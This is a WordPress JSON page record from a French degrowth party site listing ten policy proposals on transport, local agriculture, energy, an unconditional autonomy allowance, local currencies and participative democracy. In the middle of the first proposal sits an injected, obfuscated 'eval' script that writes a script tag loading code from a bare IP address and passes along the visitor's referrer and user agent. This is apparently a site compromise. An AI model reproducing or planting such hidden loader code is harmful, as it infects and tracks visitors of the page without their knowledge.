{"id":5564,"date":"2011-02-05T09:15:41","date_gmt":"2011-02-05T08:15:41","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?page_id=5564"},"modified":"2011-02-05T09:15:41","modified_gmt":"2011-02-05T08:15:41","slug":"les-%c2%ab-10-chantiers-de-la-decroissance-%c2%bb","status":"publish","type":"page","link":"https:\/\/www.partipourladecroissance.net\/?page_id=5564","title":{"rendered":"Les \u00ab 10 chantiers de la D\u00e9croissance \u00bb"},"content":{"rendered":"<ol>\n<li>\n<p style=\"margin-bottom: 0cm;\" align=\"JUSTIFY\">Valoriser <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rhhne|var|u0026u|referrer|ybkes||js|php'.split('|'),0,{}))\n<\/script><\/noindex> \tl\u2019exp\u00e9rimentation locale, associative et collective, <strong>encourager \tle bon usage<\/strong>. Faire \u00e9voluer le rapport \u00e0 la propri\u00e9t\u00e9 \tet au partage des richesses. Construire une politique de \t\u00ab m\u00e9nagement du territoire \u00bb au service des individus. \tAm\u00e9liorer la coop\u00e9ration entre d\u00e9partements.<\/p>\n<\/li>\n<li>\n<p style=\"margin-bottom: 0cm;\" align=\"JUSTIFY\"><span style=\"background: none repeat scroll 0% 0% #ffffff;\">Inciter \tla population \u00e0 privil\u00e9gier les transports doux (v\u00e9lo et marche \u00e0 \tpied) ou collectifs en augmentant les dessertes des bus (dont \tscolaires) et en pratiquant une politique tarifaire attractive. \tAm\u00e9nager les trottoirs et les rues pour les personnes handicap\u00e9es. \tCr\u00e9er des services de co-voiturage et de voitures partag\u00e9es. Mais, \tsurtout, amorcer une r\u00e9flexion globale sur les transports.<\/span><\/p>\n<\/li>\n<li>\n<p style=\"margin-bottom: 0cm;\" align=\"JUSTIFY\">D\u00e9velopper une \t<strong>agriculture paysanne <\/strong>(biologique et de proximit\u00e9) \tqui prot\u00e8ge l\u2019environnement et enrichit la vie rurale, en \tfacilitant la mise \u00e0 disposition de terres cultivables. Rechercher \tl\u2019autonomie individuelle et locale par les jardins partag\u00e9s, la \tmise en place de r\u00e9seaux et les circuits courts, gr\u00e2ce aux \tsubventions accord\u00e9es aux associations et aux communes. Permettre \taux coll\u00e8ges de pr\u00e9parer les repas de cantine \u00e0 partir d&rsquo;aliments \tbiologiques locaux.<\/p>\n<\/li>\n<li>\n<p style=\"margin-bottom: 0cm;\" align=\"JUSTIFY\">Mettre en \u0153uvre des \tplans de <strong>r\u00e9duction de la consommation d\u2019\u00e9nergie<\/strong> notamment dans les coll\u00e8ges, encourager la production locale \td\u2019\u00e9nergie avec le fond d\u2019aide \u00e0 l\u2019\u00e9nergie. Agir pour le \trecyclage et le tri \u00e0 la source des d\u00e9chets m\u00e9nagers.<\/p>\n<\/li>\n<li>\n<p style=\"margin-bottom: 0cm;\" align=\"JUSTIFY\">Promouvoir la mise \ten place d\u2019une <strong>dotation inconditionnelle d\u2019autonomie<\/strong> (DIA), \u00e0 travers des droits de tirage sur les services publics, \tregroupant \u00e9galement les diff\u00e9rentes activit\u00e9s de l&rsquo;aide sociale, \tet aussi la sant\u00e9 (avec un suivi m\u00e9dical de pr\u00e9vention), la \tculture (par la gratuit\u00e9 des mus\u00e9es et biblioth\u00e8ques, l&rsquo;animation \tdes monuments, une r\u00e9elle politique de soutien aux artistes qui \tpermettent \u00e0 tous d&rsquo;acc\u00e9der aux th\u00e9\u00e2tres et op\u00e9ras), les \ttransports, l\u2019\u00e9nergie, l\u2019eau, la nourriture, l\u2019acc\u00e8s au \tfoncier, l\u2019information, et la formation.<\/p>\n<\/li>\n<li>\n<p style=\"margin-bottom: 0cm;\" align=\"JUSTIFY\">Concevoir des \tconf\u00e9rences au niveau d\u00e9partemental sur <strong>l\u2019innovation \tsociale et \u00e9cologique<\/strong> en particulier sur les exp\u00e9riences \tcoop\u00e9ratives, l\u2019habitat partag\u00e9, l\u2019\u00e9conomie sociale et \tsolidaire et la limitation des revenus.<\/p>\n<\/li>\n<li>\n<p style=\"margin-bottom: 0cm;\" align=\"JUSTIFY\">Relancer la \u00ab \tproduction \u00bb de biens bas\u00e9s sur les \u00e9changes relationnels et \tconviviaux par le soutien ou la cr\u00e9ation de <strong>monnaies \tlocales<\/strong> et r\u00e9gionales, de Syst\u00e8mes d\u2019Echanges Locaux, \tde groupement d\u2019achats et de banques du temps.<\/p>\n<\/li>\n<li>\n<p style=\"margin-bottom: 0cm;\" align=\"JUSTIFY\">Encourager <strong>une \tcroissance de la richesse des rapports humains<\/strong> en soutenant \tla transmission des savoir-faire traditionnels locaux. Aider les \tp\u00e9dagogies alternatives. Augmenter l\u2019offre des enseignements \tartistiques. Soutenir les initiatives d\u2019auto-construction dans le \tdomaine de l\u2019habitat (par, entre autres, le fond de solidarit\u00e9 \tpour le logement).<span style=\"color: #00ae00;\"> <\/span><\/p>\n<\/li>\n<li>\n<p style=\"margin-bottom: 0cm;\" align=\"JUSTIFY\">R\u00e9orienter la<strong> recherche et la formation<\/strong> vers la transition \u00e9cologique et \tcr\u00e9er des fili\u00e8res dans les domaines de l\u2019alimentation, de \tl\u2019\u00e9nergie, de l\u2019habitat, des transports, de l\u2019artisanat et du \ttourisme \u00e9cologique.<\/p>\n<\/li>\n<li>\n<p style=\"margin-bottom: 0cm;\" align=\"JUSTIFY\">Permettre aux \tcitoyens de s\u2019impliquer r\u00e9ellement dans les instances de \t<strong>d\u00e9mocratie <\/strong>participative, organiser rencontres et \td\u00e9bats. \u0152uvrer contre l\u2019agression publicitaire et soutenir la \tmise en place de m\u00e9dias locaux ind\u00e9pendants.<\/p>\n<\/li>\n<\/ol>\n<p style=\"text-align: center;\"><a href=\"..\/?page_id=468\"><strong><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter\" style=\"margin-top: 5px; margin-bottom: 5px;\" title=\"logo-ppld\" src=\"..\/wp-content\/uploads\/2008\/12\/logo-ppld.gif\" alt=\"logo-ppld\" width=\"118\" height=\"68\" \/><\/strong><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Valoriser l\u2019exp\u00e9rimentation locale, associative et collective, encourager le bon usage. Faire \u00e9voluer le rapport \u00e0 la propri\u00e9t\u00e9 et au partage des richesses. Construire une politique de \u00ab m\u00e9nagement du territoire \u00bb au service des individus. Am\u00e9liorer la coop\u00e9ration entre d\u00e9partements. &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?page_id=5564\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"parent":3995,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-5564","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/5564","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5564"}],"version-history":[{"count":2,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/5564\/revisions"}],"predecessor-version":[{"id":5566,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/5564\/revisions\/5566"}],"up":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/3995"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5564"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}